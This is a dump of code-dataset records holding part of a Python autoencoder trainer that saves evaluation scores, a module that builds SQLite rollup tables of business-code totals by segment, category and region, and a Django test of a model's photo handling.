scores_mask1 = np.asarray(scores_mask1)\n scores_mask2 = np.asarray(scores_mask2)\n scores_mask1_s = np.asarray(scores_mask1_s)\n scores_mask2_s = np.asarray(scores_mask2_s)\n # scores_scaled = (scores - min(scores)) / (max(scores) - min(scores))\n step = self.sess.run(self.model.global_step_tensor)\n percentiles = np.asarray(self.config.trainer.percentiles)\n save_results(\n self.config.log.result_dir,\n scores_rec,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_rec\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_den,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_den\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_pipe,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_pipe_1\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_pipe_2,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_pipe_2\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask1,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_1\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask2,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_2\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask1_s,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_1_s\",\n \"paper\",\n self.config.trainer.label,\n 
self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask2_s,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_2_s\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n\n\n", "sub_path": "trainers/autoencoder_denoiser_trainer.py", "file_name": "autoencoder_denoiser_trainer.py", "file_ext": "py", "file_size_in_byte": 11288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.base_train_multi.BaseTrainMulti", "line_number": 9, "usage_type": "name"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 138, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "time.time", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 186, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 200, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 214, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 228, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 242, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 256, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 270, "usage_type": "call"}]} +{"seq_id": "604964105", "text": "'''\nCreated on Dec 18, 2018\n\n@author: 
vahidrogo\n'''\n\nimport pandas as pd\nimport sqlite3 as sql\nimport threading\nfrom tkinter import messagebox as msg\n\nimport constants\nfrom progress import Progress\nimport utilities\n\n\nclass RollupTotals(threading.Thread):\n '''\n Parent class for SegmentTotals(), SegmentTotalsRegion(), \n CategoryTotals() and CategoryTotalsRegion().\n \n Creates a new table with the data fetched using the query \n set in each of the child classes.\n '''\n \n \n FIRST_QUARTER_COLUMN = 3\n \n\n def __init__(\n self, is_addon=False, is_category=True, is_region=False,\n is_business_code_totals=False\n ):\n super().__init__()\n \n self.is_addon = is_addon\n self.is_category = is_category\n self.is_region = is_region\n self.is_business_code_totals = is_business_code_totals\n \n self.title = constants.APP_NAME\n \n self.input_table_name = constants.BUSINESS_CODE_TOTALS_TABLE\n \n if self.is_addon:\n self.input_table_name += constants.ADDON_SUFFIX\n \n self.df = None\n \n self.query = ''\n self.rollup_id_name = ''\n self.rollup_table_name = ''\n \n \n def run(self):\n if self.is_addon:\n self.rollup_table_name += constants.ADDON_SUFFIX\n \n self.progress = Progress(self, self.title, abort=False)\n \n self.progress.update_progress(0, 'Fetching business code totals.')\n \n self._set_df()\n \n progress = 90 if self.is_region else 70\n \n self.progress.update_progress(progress, 'Preparing data.')\n \n if self.df is not None:\n # drops the old id column\n self.df.drop(constants.ID_COLUMN_NAME, axis=1, inplace=True)\n \n if not self.is_business_code_totals:\n # drops the business code id column\n self.df.drop(\n constants.BUSINESS_CODE_ID_COLUMN_NAME, axis=1, inplace=True\n )\n \n self._update_column_names()\n \n self._set_region_id_column()\n \n column_names = list(self.df)\n \n juri_column = (\n constants.REGION_ID_COLUMN_NAME if self.is_region \n else constants.TAC_COLUMN_NAME\n )\n \n # sets the columns that will be used in the table in the order \n # that they will be in\n new_column_names = [\n constants.ID_COLUMN_NAME, juri_column, self.rollup_id_name\n ] + column_names[self.FIRST_QUARTER_COLUMN:]\n \n self.df = self.df[new_column_names]\n \n self._group_by_new_id()\n \n progress = 95 if self.is_region else 85\n \n self.progress.update_progress(progress, 'Creating table.')\n \n self._create_table()\n \n self.progress.update_progress(100, 'Build complete.')\n \n self.progress.destroy()\n \n \n def _set_df(self):\n sql_code = 'ATTACH DATABASE ? 
AS ?'\n        \n        args = (str(constants.DB_PATHS[constants.STARS_DB]), constants.STARS_DB)\n        \n        con = sql.connect(\n            constants.DB_PATHS[constants.STATEWIDE_DATASETS_DB], uri=True,\n            timeout=constants.DB_TIMEOUT\n            )\n        \n        db_attached = utilities.execute_sql(\n            sql_code=sql_code, args=args, open_con=con, dontfetch=True\n            )\n        \n        if db_attached:\n            results = utilities.execute_sql(\n                sql_code=self.query, open_con=con, getcursor=True\n                )\n            \n            if results:\n                column_names = [i[0] for i in results.description]\n                \n                data = results.fetchall()\n                \n                self.df = pd.DataFrame(data, columns=column_names)\n            \n        con.close()\n        \n        \n    def _update_column_names(self):\n        column_names = list(self.df)\n        \n        # changes column to \"id\" from \"new_id\"\n        column_names[0] = constants.ID_COLUMN_NAME\n        \n        if self.is_region:\n            tac_index = 1 if self.is_business_code_totals else 2\n            \n            # changes column to \"region_id\" from \"tac\"\n            column_names[tac_index] = constants.REGION_ID_COLUMN_NAME\n        \n        # updates the column names in the dataframe\n        self.df.columns = column_names\n        \n        \n    def _set_region_id_column(self):\n        # gets the regions id's from the id column\n        region_id_column = self.df[\n            constants.ID_COLUMN_NAME\n            ].apply(lambda x: x.split('-')[0])\n        \n        self.df[constants.REGION_ID_COLUMN_NAME] = region_id_column\n        \n\n    def _group_by_new_id(self):\n        column_names = list(self.df)\n        \n        group_columns = column_names[:self.FIRST_QUARTER_COLUMN]\n        \n        sum_columns = column_names[self.FIRST_QUARTER_COLUMN:]\n        \n        self.df = self.df.groupby(\n            group_columns, as_index=False, sort=False\n            )[sum_columns].sum()\n        \n        \n    def _create_table(self):\n        con = sql.connect(\n            constants.DB_PATHS[constants.STATEWIDE_DATASETS_DB], \n            timeout=constants.DB_TIMEOUT\n            )\n        \n        try:\n            with con:\n                self.df.to_sql(\n                    self.rollup_table_name, con, if_exists='replace', \n                    index=False\n                    )\n            \n        except sql.OperationalError as e:\n            msg.showerror(self.title, e)\n            \n        con.close()\n        \n        \nclass SegmentTotals(RollupTotals):\n    '''\n    Creates the \"segment_totals\" table in the \"statewide_datasets\"\n    database. The table contains the amounts from the \n    \"business_code_totals\" table also in \"statewide_datasets\" rolled\n    up by \"segment_id\". The \"segment_id\" comes from the \"segments\" \n    table in \"starsdb\" based on the \"business_code_id\" from the \n    \"business_code_totals\" table.\n    '''\n    \n\n    def __init__(self, is_addon=False):\n        super().__init__(is_addon)\n        \n        self.title += ' - Segment Totals'\n        \n        self.query = f'''\n            SELECT d.{constants.TAC_COLUMN_NAME} || '-' || \n            s.{constants.ID_COLUMN_NAME} new_id, \n            s.{constants.ID_COLUMN_NAME} {constants.SEGMENT_ID_COLUMN_NAME}, \n            d.* \n            \n            FROM {self.input_table_name} d, \n            {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n            {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s\n            \n            WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n            =b.{constants.ID_COLUMN_NAME} \n            AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n            =s.{constants.ID_COLUMN_NAME} \n            '''\n        \n        self.rollup_id_name = constants.SEGMENT_ID_COLUMN_NAME\n        \n        self.rollup_table_name = 'segment_totals'\n        \n        self.start()\n        \n        \nclass SegmentTotalsRegion(RollupTotals):\n    '''\n    Creates the \"segment_totals_region\" table in the \"statewide_datasets\"\n    database. The table contains the amounts from the \n    \"business_code_totals\" table also in \"statewide_datasets\" rolled up by\n    \"segment_id\" and \"region_id\". The \"segment_id\" comes from the \n    \"segments\" table in \"starsdb\" based on the \"business_code_id\" from the \n    \"business_code_totals\" table. 
The \"region_id\" comes from the \n \"jurisdictions\" table also in \"starsdb\".\n '''\n \n\n def __init__(self):\n super().__init__(is_region=True)\n \n self.title += ' - Segment Totals Region'\n \n self.query = f'''\n SELECT c.region_id || '-' || \n s.{constants.ID_COLUMN_NAME} new_id, \n s.{constants.ID_COLUMN_NAME} {constants.SEGMENT_ID_COLUMN_NAME}, \n d.*\n \n FROM {self.input_table_name} as d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} c,\n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s,\n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME}\n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME}\n AND d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.SEGMENT_ID_COLUMN_NAME\n \n self.rollup_table_name = 'segment_totals_region'\n \n self.start()\n \n \nclass CategoryTotals(RollupTotals):\n '''\n Creates the \"category_totals\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up by\n \"category_id\". The \"category_id\" comes from the \"segments\" table in \n \"starsdb\" based on the \"segment_id\" that comes from the \"business_codes\" \n table also in \"starsdb\". The \"segment_id\" is based on the \n \"business_code_id\" in the \"business_code_totals\" table.\n '''\n \n \n def __init__(self, is_addon=False):\n super().__init__(is_addon, is_category=True)\n \n self.title += ' - Category Totals'\n \n self.query = f'''\n SELECT d.{constants.TAC_COLUMN_NAME} || '-' || \n c.{constants.ID_COLUMN_NAME} as new_id, \n c.{constants.ID_COLUMN_NAME} as \n {constants.CATEGORY_ID_COLUMN_NAME}, d.* \n \n FROM {self.input_table_name} as d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} as b, \n {constants.STARS_DB}.{constants.CATEGORIES_TABLE} as c, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} as s \n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME}\n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n AND s.{constants.CATEGORY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.CATEGORY_ID_COLUMN_NAME\n \n self.rollup_table_name = 'category_totals'\n \n self.start()\n \n \nclass CategoryTotalsRegion(RollupTotals):\n '''\n Creates the \"category_totals_region\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up \n by \"category_id\" and \"region_id\". The \"category_id\" comes from the \n \"segments\" table in \"starsdb\" based on the \"segment_id\" that comes \n from the \"business_codes\" table also in \"starsdb\". The \"segment_id\" \n is based on the \"business_code_id\" in the \"business_code_totals\" \n table. The \"region_id\" comes from the \"jurisdictions\" table in \n \"starsdb\". 
\n '''\n \n \n def __init__(self):\n super().__init__(is_region=True)\n \n self.title += ' - Category Totals Region'\n \n self.query = f'''\n SELECT co.region_id || '-' || \n c.{constants.ID_COLUMN_NAME} new_id, \n c.{constants.ID_COLUMN_NAME} {constants.CATEGORY_ID_COLUMN_NAME}, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} co,\n {constants.STARS_DB}.{constants.CATEGORIES_TABLE} c, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s, \n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME} \n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n AND s.{constants.CATEGORY_ID_COLUMN_NAME}\n =c.{constants.ID_COLUMN_NAME}\n AND d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =co.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.CATEGORY_ID_COLUMN_NAME\n \n self.rollup_table_name = 'category_totals_region'\n \n self.start()\n \n \nclass BusinessCodeTotalsRegion(RollupTotals):\n '''\n Creates the \"business_code_totals_region\" table in the \n \"statewide_datasets\" database. The table contains the amounts from \n the \"business_code_totals\" table also in the \"statewide_datasets\" \n rolled up by \"region_id\". The \"region_id\" comes form the \n \"jurisdictions\" table in \"starsdb\".\n '''\n \n \n def __init__(self):\n super().__init__(is_region=True, is_business_code_totals=True)\n \n self.title += ' - Business Code Totals Region'\n \n self.query = f'''\n SELECT co.region_id || '-' || \n d.{constants.BUSINESS_CODE_ID_COLUMN_NAME} new_id, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.COUNTIES_TABLE} co,\n {constants.STARS_DB}.{constants.JURISDICTIONS_TABLE} j\n \n WHERE d.{constants.TAC_COLUMN_NAME}\n =j.{constants.TAC_COLUMN_NAME}\n AND j.{constants.COUNTY_ID_COLUMN_NAME}\n =co.{constants.ID_COLUMN_NAME}\n '''\n \n self.rollup_id_name = constants.BUSINESS_CODE_ID_COLUMN_NAME\n \n self.rollup_table_name = 'business_code_totals_region'\n \n self.start()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n", "sub_path": "rolluptotals.py", "file_name": "rolluptotals.py", "file_ext": "py", "file_size_in_byte": 15103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Thread", "line_number": 17, "usage_type": "attribute"}, {"api_name": "constants.APP_NAME", "line_number": 41, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_TOTALS_TABLE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "constants.ADDON_SUFFIX", "line_number": 46, "usage_type": "attribute"}, {"api_name": "constants.ADDON_SUFFIX", "line_number": 57, "usage_type": "attribute"}, {"api_name": "progress.Progress", "line_number": 59, "usage_type": "call"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 71, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 76, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 86, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 87, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 93, "usage_type": "attribute"}, {"api_name": 
"constants.DB_PATHS", "line_number": 114, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 116, "usage_type": "call"}, {"api_name": "constants.DB_PATHS", "line_number": 117, "usage_type": "attribute"}, {"api_name": "constants.STATEWIDE_DATASETS_DB", "line_number": 117, "usage_type": "attribute"}, {"api_name": "constants.DB_TIMEOUT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "utilities.execute_sql", "line_number": 121, "usage_type": "call"}, {"api_name": "utilities.execute_sql", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 135, "usage_type": "call"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 144, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 150, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 159, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 162, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 178, "usage_type": "call"}, {"api_name": "constants.DB_PATHS", "line_number": 179, "usage_type": "attribute"}, {"api_name": "constants.STATEWIDE_DATASETS_DB", "line_number": 179, "usage_type": "attribute"}, {"api_name": "constants.DB_TIMEOUT", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sqlite3.OperationalError", "line_number": 190, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 191, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 191, "usage_type": "name"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 213, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 214, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 215, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 215, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 219, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 219, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 220, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 220, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 222, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 223, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 224, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 225, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 228, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 254, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 255, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 255, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 259, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 259, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", 
"line_number": 261, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 261, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 262, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 262, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 264, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 265, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 266, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 267, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 268, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 269, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 270, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 271, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 274, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 299, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 300, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 301, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 302, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 305, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 305, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 306, "usage_type": "attribute"}, {"api_name": "constants.CATEGORIES_TABLE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 307, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 307, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 309, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 310, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 311, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 312, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 313, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 314, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 317, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 345, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 346, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 346, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 350, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 350, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 351, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 351, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 352, "usage_type": "attribute"}, {"api_name": "constants.CATEGORIES_TABLE", "line_number": 352, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", 
"line_number": 353, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 353, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 354, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 354, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 356, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 357, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 358, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 359, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 360, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 361, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 362, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 363, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 364, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 365, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 368, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 392, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 396, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 396, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 397, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 397, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 399, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 400, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 401, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 402, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 405, "usage_type": "attribute"}]} +{"seq_id": "270111986", "text": "# -*- coding: utf-8 -*-\r\nfrom django.test import TestCase\r\nfrom apps.hello.models import Person\r\nfrom django.test.utils import override_settings\r\nfrom django.core.files.uploadedfile import SimpleUploadedFile\r\nimport os\r\nfrom django.conf import settings\r\nimport shutil\r\n\r\n\r\n@override_settings(MEDIA_ROOT=settings.MEDIA_TEST_ROOT)\r\nclass PersonModelTest(TestCase):\r\n\r\n def setUp(self):\r\n self.test_person = Person.objects.first()\r\n self.test_img_path = os.path.join(\r\n settings.BASE_DIR,\r\n 'assets/img/test_image.png'\r\n )\r\n with open(self.test_img_path, 'rb') as test_img:\r\n self.test_image_1 = SimpleUploadedFile(\r\n name='test_image_1.png',\r\n content=test_img.read(),\r\n content_type='image/png'\r\n )\r\n self.test_person.photo = self.test_image_1\r\n self.test_person.save()\r\n self.first_photo_file = self.test_person.photo.path\r\n\r\n def tearDown(self):\r\n test_dir = os.path.exists(settings.MEDIA_TEST_ROOT)\r\n if test_dir:\r\n shutil.rmtree(settings.MEDIA_TEST_ROOT)\r\n\r\n def test_save_method(self):\r\n \"\"\"Check, if model save method,\r\n save first person photo to proper filesystem path,\r\n and crop image to proper size\"\"\"\r\n self.assertTrue(os.path.exists(self.first_photo_file))\r\n 
self.assertEqual(\r\n self.first_photo_file,\r\n settings.MEDIA_TEST_ROOT + self.test_person.photo.name\r\n )\r\n self.assertTrue(\r\n self.test_person.photo.width <= 200 and\r\n self.test_person.photo.height <= 200\r\n )\r\n\r\n def test_save_method_remove_unused_img(self):\r\n \"\"\"Check, if model save method delete unused images\"\"\"\r\n with open(self.test_img_path, 'rb') as test_img:\r\n self.test_image_2 = SimpleUploadedFile(\r\n name='test_image_2.png',\r\n content=test_img.read(),\r\n content_type='image/png'\r\n )\r\n self.test_person.photo = self.test_image_2\r\n self.test_person.save()\r\n self.second_photo_file = self.test_person.photo.path\r\n self.assertTrue(os.path.exists(self.second_photo_file))\r\n self.assertFalse(os.path.exists(self.first_photo_file))\r\n", "sub_path": "apps/hello/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 2300, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": 